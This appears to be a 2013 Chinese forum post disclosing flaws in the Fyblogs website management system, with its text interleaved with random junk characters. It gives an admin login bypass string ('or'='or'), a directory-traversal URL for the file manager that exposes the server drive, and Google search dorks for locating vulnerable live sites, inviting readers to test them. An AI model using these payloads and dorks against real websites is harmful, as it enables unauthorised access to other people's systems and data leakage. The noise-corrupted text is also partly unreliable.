漏洞类型: 未授权访问/权限绕过7 w ~8 O7 D) @" T8 f! B! d
3 v9 c6 U) B/ J# ~% v& T2 y
简要描述:/ F6 y k6 q4 O8 U" E9 B5 f3 v
" D4 a; |- I" d2 n# W5 o
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!" W2 |5 S7 Q8 [5 A
. Z# v% S8 j* r* d详细说明:
5 Z- Y% F2 } F3 H: K0 r. @8 E' C; u. q; P8 c) t2 c9 q
后台万能密码 'or'='or'
1 E% J5 e/ i6 k5 Z6 L1 b3 K" j后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
$ j% w- O) q. g) n$ f* @( Zadmin/uploadfile.asp?currentFolder=/upfiles/../
5 g0 V6 b5 X8 G- j% H: c2 l4 D5 \( s; S* @/ N
漏洞证明:
! h$ U3 U$ q6 Y# i
( ]# W4 }+ q/ A* y谷歌:inurl:type.asp?id=1 新闻中心
0 ]. ?6 E' d& y- B; e7 G或者 :inurl:download_ok.asp?
( ?' N7 U4 x5 Q& u+ I
# L! @: X7 A9 o" G+ L2 X可以测试
* _, ^* m; Y8 b4 z [3 z% u( E7 v/ k( U8 s/ x
' E3 r( v8 f: [6 T |
发表于 2013-3-7 13:07:46
收藏
支持
反对